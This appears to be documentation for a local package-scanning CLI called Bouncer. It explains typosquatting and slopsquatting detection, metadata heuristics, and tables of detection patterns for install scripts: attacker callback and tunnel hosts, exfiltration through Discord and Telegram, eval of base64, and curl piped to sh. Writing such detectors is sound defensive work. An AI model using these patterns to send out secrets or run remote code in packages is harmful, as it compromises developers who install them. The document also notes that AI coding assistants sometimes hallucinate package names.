CLI
The free CLI runs multiple heuristics and rules on every package install across all supported package managers. All scanning happens on your machine. Nothing is sent to Bouncer's servers.
These heuristics are intentionally simple, but they're surprisingly effective at catching the low-effort malicious packages that make up a lot of real-world registry abuse.
That said, pattern matching has real limits. It misses clever attacks that don't match a known signature, and it generates false positives on legitimate packages that happen to look suspicious — which gets annoying fast when every other install nags you. Cloud AI reads the actual source code with a frontier model to catch novel attacks and dramatically reduce the false positives you have to click through.
Typosquatting detection
Compares the package name against a list of popular packages using Damerau-Levenshtein distance. Catches common character swaps, missing characters, and keyboard-adjacent typos.
This also protects against slopsquatting — a growing attack vector where AI coding assistants hallucinate non-existent package names in generated code. Attackers register these hallucinated names and fill them with malware. Bouncer's typosquatting detection flags these packages when they are close to a popular package name, and the metadata checks below flag them as brand-new packages with zero download history.
Metadata heuristics
Checks package metadata from the registry for signals that correlate with malicious packages. Each check runs independently and can be configured or disabled separately:
- Package published less than 72 hours ago (configurable via
min_package_hours) - Package has no README
- Package runs scripts during installation
- Fewer than 100 weekly downloads (configurable via
min_downloads)
See Configuration for details on adjusting thresholds.
Install script red flags
Scans install scripts and entry points (setup.py, postinstall.js, index.js, __init__.py, etc.) for known malicious patterns.
Block patterns (high confidence)
| Pattern | Why it's dangerous |
|---|---|
| burpcollaborator.net | Attacker callback server |
| Telegram bot sendDocument | Document exfiltration |
| Discord webhook in install script | Credential exfiltration |
Warn patterns (medium confidence)
| Pattern | Why it's suspicious |
|---|---|
| eval + base64 | Hidden code execution |
| exec + decode | Obfuscated payload |
| requestbin, hookbin, pipedream | Exfiltration service URLs |
| ngrok.io | Tunnel to attacker machine |
| curl | sh in install script | Remote code execution |
Binary-only packages
Some packages ship compiled binaries or pre-built artifacts with no readable source code. Bouncer flags these with the binary_no_source rule because source-level scanners can't verify what the code actually does — all the pattern checks above are defeated the moment a package hides its logic in a blob.
Scanning binaries is hard. Reverse-engineering compiled code at scale is an open problem, and generic heuristics produce more noise than signal. It's a known gap and a future focus area for Bouncer. For now, binary-only packages deserve extra scrutiny on every install.